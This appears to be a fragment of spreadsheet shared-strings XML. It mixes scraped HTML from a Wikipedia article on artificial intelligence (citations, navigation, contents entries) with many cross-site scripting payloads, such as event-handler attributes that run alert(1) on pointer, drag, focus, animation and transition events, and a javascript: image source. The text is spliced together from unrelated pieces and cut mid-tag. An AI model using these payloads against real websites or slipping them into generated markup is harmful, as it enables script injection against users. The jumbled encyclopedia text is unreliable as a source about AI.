title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=26.1.2%3A+Philosophical+Foundations%2FWeak+AI%3A+Can+Machines+Act+Intelligently%3F%2FThe+mathematical+objection&amp;amp;rft.btitle=Artificial+Intelligence%3A+A+Modern+Approach&amp;amp;rft.place=Upper+Saddle+River%2C+NJ&amp;amp;rft.edition=3rd&amp;amp;rft.pub=Prentice+Hall&amp;amp;rft.date=2010&amp;amp;rft.isbn=978-0-13-604259-4&amp;amp;rft.au=Stuart+J.+Russell&amp;amp;rft.au=Peter+Norvig&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;address onpointerdown=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;ins id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/ins&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onpointermove=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;br id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;ul id="footer-info" class=""&gt;</t>
  </si>
  <si>
    <t>&lt;command draggable="true" ondragend="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;li&gt;&lt;a href="#"&gt;Docs&lt;/a&gt; &amp;raquo;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Approaches"&gt;Approaches </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to scrape with your browser’s developer tools.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=" &amp;#14;  javascript:alert('');"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Cognitive simulation </t>
  </si>
  <si>
    <t>&lt;bdi ondblclick="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/keygen&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;optgroup style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;legend onbeforepaste="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;style ondrop=alert(1) contenteditable&gt;drop here&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointermove=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:D%C3%A9tection_de_personne_-_exemple_3.jpg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/f/f5/D%C3%A9tection_de_personne_-_exemple_3.jpg/220px-D%C3%A9tection_de_personne_-_exemple_3.jpg" decoding="async" width="220" height="147" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/f/f5/D%C3%A9tection_de_personne_-_exemple_3.jpg/330px-D%C3%A9tection_de_personne_-_exemple_3.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/f5/D%C3%A9tection_de_personne_-_exemple_3.jpg/440px-D%C3%A9tection_de_personne_-_exemple_3.jpg 2x" data-file-width="800" data-file-height="533" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=ProPublica&amp;amp;rft.atitle=How+We+Analyzed+the+COMPAS+Recidivism+Algorithm&amp;amp;rft.date=2016-05-23&amp;amp;rft.aulast=Jeff+Larson&amp;amp;rft.aufirst=Julia+Angwin&amp;amp;rft_id=https%3A%2F%2Fwww.propublica.org%2Farticle%2Fhow-we-analyzed-the-compas-recidivism-algorithm&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFEdelson1991" class="citation book"&gt;Edelson, Edward (1991). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/nervoussystem0000edel"&gt;&lt;i&gt;The Nervous System &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;strong ondrop=alert(1) contenteditable&gt;drop here&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-396"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-396"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;link rel="dns-prefetch" href="//meta.wikimedia.org" /&gt;</t>
  </si>
  <si>
    <t>&lt;head id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKurzweil2005" class="citation book"&gt;&lt;a href="/wiki/Ray_Kurzweil" title="Ray Kurzweil"&gt;Kurzweil, Ray &lt;/a&gt; (2005). &lt;a href="/wiki/The_Singularity_is_Near" class="mw-redirect" title="The Singularity is Near"&gt;&lt;i&gt;The Singularity is Near &lt;/i&gt; &lt;/a&gt;. Penguin Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-670-03384-3" title="Special:BookSources/978-0-670-03384-3"&gt;&lt;bdi&gt;978-0-670-03384-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Singularity+is+Near&amp;amp;rft.pub=Penguin+Books&amp;amp;rft.date=2005&amp;amp;rft.isbn=978-0-670-03384-3&amp;amp;rft.aulast=Kurzweil&amp;amp;rft.aufirst=Ray&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation encyclopaedia"&gt;Thomason, Richmond. &lt;a rel="nofollow" class="external text" href="https://plato.stanford.edu/entries/logic-ai/"&gt;"Logic and Artificial Intelligence" &lt;/a&gt;.  In &lt;a href="/wiki/Edward_N._Zalta" title="Edward N. Zalta"&gt;Zalta, Edward N. &lt;/a&gt; (ed.). &lt;i&gt;&lt;a href="/wiki/Stanford_Encyclopedia_of_Philosophy" title="Stanford Encyclopedia of Philosophy"&gt;Stanford Encyclopedia of Philosophy &lt;/a&gt; &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Logic+and+Artificial+Intelligence&amp;amp;rft.btitle=Stanford+Encyclopedia+of+Philosophy&amp;amp;rft.aulast=Thomason&amp;amp;rft.aufirst=Richmond&amp;amp;rft_id=https%3A%2F%2Fplato.stanford.edu%2Fentries%2Flogic-ai%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;q onpointerdown=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;header id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;td onmousedown="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Ontanon, Santiago; Synnaeve, Gabriel; Uriarte, Alberto; Richoux, Florian; Churchill, David; Preuss, Mike (December 2013). "A Survey of Real-Time Strategy Game AI Research and Competition in StarCraft". &lt;i&gt;IEEE Transactions on Computational Intelligence and AI in Games &lt;/i&gt;. &lt;b&gt;5 &lt;/b&gt; (4): 293–311. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.406.2524"&gt;10.1.1.406.2524 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;textarea onmousedown="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;a draggable="true" ondragend="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a href="/wiki/David_Silver_(programmer)" class="mw-redirect" title="David Silver (programmer)"&gt;Silver, David &lt;/a&gt;; Schrittwieser, Julian; Simonyan, Karen; Antonoglou, Ioannis; &lt;a href="/wiki/Aja_Huang" title="Aja Huang"&gt;Huang, Aja &lt;/a&gt;; Guez, Arthur; Hubert, Thomas; Baker, Lucas; Lai, Matthew; Bolton, Adrian; &lt;a href="/wiki/Chen_Yutian" title="Chen Yutian"&gt;Chen, Yutian &lt;/a&gt;; Lillicrap, Timothy; &lt;a href="/wiki/Fan_Hui" title="Fan Hui"&gt;Fan, Hui &lt;/a&gt;; Sifre, Laurent; Driessche, George van den; Graepel, Thore; &lt;a href="/wiki/Demis_Hassabis" title="Demis Hassabis"&gt;Hassabis, Demis &lt;/a&gt; (19 October 2017). &lt;a rel="nofollow" class="external text" href="http://discovery.ucl.ac.uk/10045895/1/agz_unformatted_nature.pdf"&gt;"Mastering the game of Go without human knowledge" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;ul onblur=alert(1) tabindex=1 id=x&gt;&lt;/ul&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;110–116,120–129 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpointerdown=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;nobr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://deepmind.com/alpha-go.html"&gt;"AlphaGo – Google DeepMind" &lt;/a&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160310191926/https://www.deepmind.com/alpha-go.html"&gt;Archived &lt;/a&gt; from the original on 10 March 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=AlphaGo+%E2%80%93+Google+DeepMind&amp;amp;rft_id=https%3A%2F%2Fdeepmind.com%2Falpha-go.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;td onpaste="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;pre ondragover=alert(1) contenteditable&gt;drop here&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;i id=x tabindex=1 onfocus=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;html ondrop=alert(1) contenteditable&gt;drop here&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;picture&gt;&lt;source srcset="validimage.png"&gt;&lt;img onload=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/menuitem&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;source onmouseover="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;small onmousemove="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote draggable="true" ondragend="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;command onkeypress="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;output id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;dl draggable="true" ondragleave="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;meta onpointerup=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;figure onkeydown="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;body onmousemove="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;wbr style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://hackernoon.com/how-ai-is-getting-groundbreaking-changes-in-talent-management-and-hr-tech-d24ty3zzd"&gt;"How AI Is Getting Groundbreaking Changes In Talent Management And HR Tech" &lt;/a&gt;. Hackernoon. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=How+AI+Is+Getting+Groundbreaking+Changes+In+Talent+Management+And+HR+Tech&amp;amp;rft.pub=Hackernoon&amp;amp;rft_id=https%3A%2F%2Fhackernoon.com%2Fhow-ai-is-getting-groundbreaking-changes-in-talent-management-and-hr-tech-d24ty3zzd&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Commensurability_(philosophy_of_science)" title="Commensurability (philosophy of science)"&gt;Commensurability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem oncontextmenu="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;span class="mw-editsection"&gt;&lt;span class="mw-editsection-bracket"&gt;[ </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;iframe ondrop=alert(1) contenteditable&gt;drop here&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;noframes oncut="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;option draggable="true" ondragleave="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;em oncut="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Further information: &lt;a href="/wiki/Technological_unemployment#21st_century" title="Technological unemployment"&gt;Technological unemployment §&amp;#160;21st century &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;code oncopy="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;applet id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;rt onmouseenter="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onmouseup="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;meta id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1921) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;output onmouseleave="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;div id="mw-fr-revisiontag" class="flaggedrevs_short flaggedrevs_stable_synced plainlinks noprint"&gt;</t>
  </si>
  <si>
    <t>&lt;sub oncopy="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;main id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;img usemap=#x&gt;&lt;map name="x"&gt;&lt;area href onfocusin=alert(1) id=x&gt;</t>
  </si>
  <si>
    <t>&lt;data onkeypress="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;image id=x tabindex=1 onfocus=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-51"&gt;&lt;a href="#Existential_risk"&gt;&lt;span class="tocnumber"&gt;8.2.1 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-sak2014-269"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-sak2014_269-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;span class="mw-editsection-bracket"&gt;[ </t>
  </si>
  <si>
    <t>&lt;menuitem id=x tabindex=1 onactivate=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;dl id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;html id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Coherentism" title="Coherentism"&gt;Coherentism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Clark, Jack (8 December 2015). &lt;a rel="nofollow" class="external text" href="https://www.bloomberg.com/news/articles/2015-12-08/why-2015-was-a-breakthrough-year-in-artificial-intelligence"&gt;"Why 2015 Was a Breakthrough Year in Artificial Intelligence" &lt;/a&gt;. &lt;i&gt;Bloomberg News &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20161123053855/https://www.bloomberg.com/news/articles/2015-12-08/why-2015-was-a-breakthrough-year-in-artificial-intelligence"&gt;Archived &lt;/a&gt; from the original on 23 November 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;23 November </t>
  </si>
  <si>
    <t>&lt;sub draggable="true" ondrag="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;hgroup ondrop=alert(1) contenteditable&gt;drop here&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpointerleave=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;rp id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;take any empty square. &lt;/li&gt; &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;content draggable="true" ondragstart="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Leverhulme_Centre_for_the_Future_of_Intelligence" title="Leverhulme Centre for the Future of Intelligence"&gt;Leverhulme Centre for the Future of Intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Weak_AI" title="Weak AI"&gt;Weak AI &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointerover=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFVinge1993"&gt;Vinge 1993 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointerenter=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;iframe style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset draggable="true" ondragstart="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointerup=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onpointerenter=alert(1)&gt;XSS&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointerout=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;picture onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/picture&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;b draggable="true" ondragleave="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;meta onmouseout="alert(1)"&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>Hegemony of the Dartmouth conference attendees:</t>
  </si>
  <si>
    <t>&lt;thead onmousedown="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onpointerdown=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;meta onpointerleave=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;content id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onbeforepaste="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;table draggable="true" ondragend="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>Representing knowledge about knowledge: Belief calculus, &lt;a href="/wiki/Modal_logic" title="Modal logic"&gt;modal logics &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;td oncontextmenu="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;del draggable="true" ondragenter="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www.patternrecognition.co.za/publications/cvdwalt_data_characteristics_classifiers.pdf"&gt;the original &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;a onkeypress="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;embed onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/embed&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onbeforecopy="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" aria-label="Portals" class="noprint portal plainlist tright"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;summary style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;dt onclick="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;button onmouseenter="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmouseenter="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;small onmouseleave="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;applet draggable="true" ondragleave="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;html ondblclick="alert(1)"&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-166"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-166"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Authority_control" title="Authority control"&gt;Authority control &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, p.&amp;#160;204 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Unmanned_ground_vehicle" title="Unmanned ground vehicle"&gt;ground &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;The number of atomic facts that the average person knows is very large. Research projects that attempt to build a complete knowledge base of &lt;a href="/wiki/Commonsense_knowledge" class="mw-redirect" title="Commonsense knowledge"&gt;commonsense knowledge &lt;/a&gt; (e.g., &lt;a href="/wiki/Cyc" title="Cyc"&gt;Cyc &lt;/a&gt;) require enormous amounts of laborious &lt;a href="/wiki/Ontology_engineering" title="Ontology engineering"&gt;ontological engineering &lt;/a&gt;—they must be built, by hand, one complicated concept at a time.&lt;sup id="cite_ref-Breadth_of_commonsense_knowledge_106-0" class="reference"&gt;&lt;a href="#cite_note-Breadth_of_commonsense_knowledge-106"&gt;&amp;#91;103&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;shadow id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/shadow&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;td style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmousemove="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFSearle1999" class="citation book"&gt;&lt;a href="/wiki/John_Searle" title="John Searle"&gt;Searle, John &lt;/a&gt; (1999). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/mindlanguagesoci00sear"&gt;&lt;i&gt;Mind, language and society &lt;/i&gt; &lt;/a&gt;. New York, NY: Basic Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-465-04521-1" title="Special:BookSources/978-0-465-04521-1"&gt;&lt;bdi&gt;978-0-465-04521-1 &lt;/bdi&gt; &lt;/a&gt;. &lt;a href="/wiki/OCLC" title="OCLC"&gt;OCLC &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/oclc/231867665"&gt;231867665 &lt;/a&gt;. &lt;/cite&gt;&lt;span 